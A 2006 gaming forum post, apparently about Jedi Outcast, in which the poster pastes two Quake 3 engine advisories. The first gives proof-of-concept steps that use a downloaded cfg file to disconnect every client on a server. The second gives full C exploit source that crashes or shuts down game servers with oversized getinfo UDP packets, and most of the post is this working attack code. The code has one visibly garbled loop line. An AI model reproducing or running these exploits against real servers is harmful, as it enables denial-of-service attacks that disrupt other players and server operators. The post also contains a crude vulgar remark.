View Single Post
Old 03-07-2006, 08:58 PM   #5
dtriniman
Rookie
 
dtriniman's Avatar
 
Join Date: Feb 2006
Location: Trinidad
Posts: 201
He should upgrade to 1.04 anyway to prevent lots of other problems. Anyway the sad thing is JO runs in the Quake 3 engine and for those that don't know Q3E = wet pu**y to hackers. Here's what you will most likely encounter:

Quake 3 Engine Buffer Overflow

Summary
The Quake 3 engine "is the well known game engine developed by ID Software and is used by many games".

Details
Vulnerable Systems:
* Call of Duty version 1.5 and prior
* Call of Duty: United Offensive version 1.5.1 and prior
* Return to Castle Wolfenstein version 1.41 and prior
* Soldier of Fortune II: Double Helix version 1.03 and prior
* Star Wars Jedi Knight II: Jedi Outcast version 1.04 and prior
* Star Wars Jedi Knight: Jedi Academy version 1.0.1.0 and prior
* Wolfenstein: Enemy Territory version 2.56 and prior
* Other games may be vulnerable as well

The problem is how the engine handles commands longer than 1022 characters, in fact they are automatically truncated at that size and the rest of the characters are handled as network data causing the engine to get confused.

If an attacker joins a server and sends a too big message any client in the server will automatically disconnect showing the "CL_ParseServerMessage: Illegible server message" error.

Proof of Concept
* Download the following file: http://aluigi.altervista.org/poc/q3msgboom.cfg.
* Place it in the base folder of your game (like baseq3, etmain, main, base and so on).
* Start a client and a server or, if possible, more clients to test better the effects of the bug.
* Join the server.
* Go into the console of a client (~ key or shift + ~).
* Type: /exec q3msgboom.
* Any client in the server will disconnect immediately.

If nothing happens or the vsay command is not supported, modify the q3msgboom.cfg file using other commands like say or vsay_team.
Jedi Knight II needs that the script is executed some times before seeing the effects.

Vendor Status
Currently only Enemy Territory 2.60 has been fixed.



Quake 3 Infostring DoS

Summary
The Quake 3 engine is "a well known game engine developed by ID Software". Due to programming bug in the Quake 3 engine, a remote attacker can cause the engine to crash by sending a malformed infostring request.

Details
Vulnerable Systems:
* Call of Duty version 1.5 and prior
* Call of Duty: United Offensive version 1.51 and prior
* Heavy Metal: F.A.K.K.2 version 1.02 and prior
* Quake III Arena version 1.32 and prior
* Return to Castle Wolfenstein version 1.41 and prior
* Soldier of Fortune II: Double Helix version 1.03 and prior
* Star Trek Voyager: Elite Force version 1.20 and prior
* Star Trek: Elite Force II version 1.10 and prior
* Star Wars Jedi Knight II: Jedi Outcast version 1.04 and prior
* Star Wars Jedi Knight: Jedi Academy version 1.011 and prior
* Wolfenstein: Enemy Territory version 1.02 / 2.56 and prior

The Quake 3 engine has problems handling big queries, allowing an attacker to shutdown any game server based on this engine:
ERROR: Info_SetValueForKey: oversize infostring

In some of the vulnerable games it is also possible to crash the server.


Exploit:
/*

by Luigi Auriemma - http://aluigi.altervista.org/poc/q3infoboom.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif

#define VER "0.1.1"
#define BUFFSZ 2048
#define TIMEOUT 2
#define MAXRETRY 3
#define INFO "\xff\xff\xff\xff" "getstatus\n"
#define GETINFO "\xff\xff\xff\xff" "getinfo "
#define GETINFOSZ (sizeof(GETINFO) - 1)

#define SEND(x,y) if(sendto(sd, x, y, 0, (struct sockaddr *)&peer, sizeof(peer)) \
< 0) std_err();
#define RECV len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \
if(len < 0) std_err();
#define RECVT if(timeout(sd) < 0) { \
fputs("\nError: socket timeout, no reply received\n\n", stdout); \
exit(1); \
} \
RECV;

void showinfo(u_char *data);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
i,
len,
slen,
from = 750,
to = BUFFSZ - GETINFOSZ,
jumps = 1,
sent = 0,
retry = 0;
u_short port;
u_char bof[BUFFSZ + 1],
buff[BUFFSZ + 1],
*p;

setbuf(stdout, NULL);

fputs("\n"
"Quake 3 engine infostring crash/shutdown scanner "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 3) {
printf("\n"
"Usage: %s [options] <server> <port>\n"
"\n"
"Options:\n"
"-f FROM start the scan from byte FROM (default %d)\n"
"-t TO finish the scan at byte TO (default %d)\n"
"-j JUMPS the number of bytes to increment for each scan.\n"
" Default value is %d, meaning that if the scan starts from %d it will\n"
" send getinfo followed by %d bytes, then %d, %d, %d and so on\n"
" until %d\n"
"\n", argv[0],
from,
to,
jumps, from,
from, from + jumps, from + (jumps * 2), from + (jumps * 3), to);
exit(1);
}

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

argc -= 2;
for(i = 1; i < argc; i++) {
switch(argv[i][1]) {
case 'f': from = atoi(argv[++i]); break;
case 't': to = atoi(argv[++i]); break;
case 'j': jumps = atoi(argv[++i]); break;
default: {
printf("\nError: wrong command-line argument (%s)\n\n", argv[i]);
exit(1);
}
}
}

port = atoi(argv[argc + 1]);
peer.sin_addr.s_addr = resolv(argv[argc]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);

sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();

fputs("- request informations:\n", stdout);
SEND(INFO, sizeof(INFO) - 1);
RECVT;
buff[len] = 0x00;
showinfo(buff);

fputs("- getinfo crash/shutdown scan:\n\n", stdout);
memcpy(bof, GETINFO, GETINFOSZ);
p = bof + GETINFOSZ;

if(from > to) from = to;
for(i = 0; i < from; i++) *p++ = 'a';
slen = p - bof;

for(; {
printf(" packet length: %d\r", slen);

SEND(bof, slen);
sent++;
if(timeout(sd) < 0) {
if(retry == MAXRETRY) break;
printf(" timeout: retry other %d times\n", MAXRETRY - retry);
retry++;
continue;
}
retry = 0;
RECV;

slen += jumps;
if((slen - GETINFOSZ) > to) {
slen -= jumps;
break;
} else if(slen > BUFFSZ) {
printf("\n\n- max local buffer size (%d) reached", BUFFSZ);
slen -= jumps;
break;
}
for(i = 0; i < jumps; i++) *p++ = 'a';
}

if(!sent) {
fputs("\n\nError: recheck your options because I have sent no packets, probably you have chosen too big values\n\n", stdout);
close(sd);
exit(1);
}

printf("\n\n- last UDP packet sent was %d bytes (jumps = %d)",
slen, slen - GETINFOSZ);

fputs("\n- check server:\n", stdout);
SEND(INFO, sizeof(INFO) - 1);
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}

void showinfo(u_char *data) {
int nt = 1;
u_char *p;

while((p = strchr(data, '\\'))) {
*p = 0x00;
if(!nt) {
printf("%30s: ", data);
nt++;
} else {
printf("%s\n", data);
nt = 0;
}
data = p + 1;
}
printf("%s\n", data);
}

int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;

tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)hp->h_addr;
}
return(host_ip);
}

#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif


dtriniman is offline   you may: quote & reply,